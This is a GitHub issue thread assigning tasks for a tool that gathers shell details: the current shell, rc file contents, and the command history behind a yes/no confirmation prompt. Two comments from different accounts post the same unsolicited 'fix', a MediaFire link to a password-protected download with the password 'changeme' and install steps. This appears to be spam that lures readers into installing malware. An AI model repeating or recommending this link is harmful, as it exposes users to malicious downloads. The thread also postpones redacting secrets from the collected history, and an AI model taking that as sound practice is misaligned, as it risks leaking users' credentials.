### ISSUE TITLE
Shell informations

### ISSUE THREAD

**Issue by psychoSherlock** [The-Capstone-Project/OS-Scraper#11]
### Task 1: 
Shell informations including but not limited to
Current shell being used
its location
contents of `.rc` file of the shell being used
eg:
```bash
/home/user/.bashrc
/home/user/.zshrc
```
### Task 2: 
Only with confirmation of the user, collect shell history. both current shell history and the history in .{shell}_history files
All KEYS should be redacted
eg:
```bash
KEY1=REDACTED
KEY2=REDACTED
command [argument] --key=REDACTED
```

You both can do work either combined or induvidually

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by vaishakhsnair** [comment]
How are we gonna implement user approval via the RAG?

**Comment by psychoSherlock** [comment]
what d u mean user approval?

**Comment by vaishakhsnair** [comment]
How are you gonna ask for user permission

**Comment by psychoSherlock** [comment]
> How are you gonna ask for user permission 

Eacg agents could jst ask for a prompt based reply right?

**Comment by psychoSherlock** [comment]
@kaalibabe 
Here's what you have to do next:
### Command line argument to fetch n history

Example:
```
go run main.go -n 100
# This should output the last 100 history
```
if given without this then show entire history
if given with the -n option but without the number then show entire history while.

Also you have to include a warning, with an yes or no prompt:
```
Warning: Entire history will be collected! Are you sure? (yes/no): 
```

Complete the tasks given ASAP.

**Comment by psychoSherlock** [comment]
@anubix05 
Extract all installed zsh plugins and display them in the same code.

**Comment by psychoSherlock** [comment]
Closing this task as of now. New tasks will be assigned soon. We can postpone the redacted part to later because we have more left to do
